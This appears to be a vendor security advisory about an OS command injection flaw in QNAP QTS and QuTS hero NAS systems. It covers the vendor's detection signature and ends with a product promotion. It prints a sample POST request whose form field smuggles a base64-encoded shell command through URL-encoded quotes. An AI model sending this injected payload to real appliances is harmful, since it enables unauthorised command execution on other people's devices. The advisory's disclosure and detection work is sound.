Appliances Details
QTS is the operating system for all entry-level and mid-level QNAP NAS models. QuTS hero is the operating system for high-end and enterprise QNAP NAS models.
Vulnerability
An OS command injection vulnerability has been reported to affect several QNAP (Quality Network Appliance Provider) operating system versions.
Identification
The use of the URL encoded double quote %22 can be used to perform the command injection. If exploited, the vulnerability could allow users to execute commands via a network.
POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image
PAYLOAD -
--avssqwfz
Content-Disposition: form-data; xxpcscma="field2"; zczqildp="%22$($(echo -n aWQ=|base64 -d)>a)%22"
Content-Type: text/plain
skfqduny
--avssqwfz...Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to inject OS commands.
Coverage
Idappcom have created signature 8024666 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional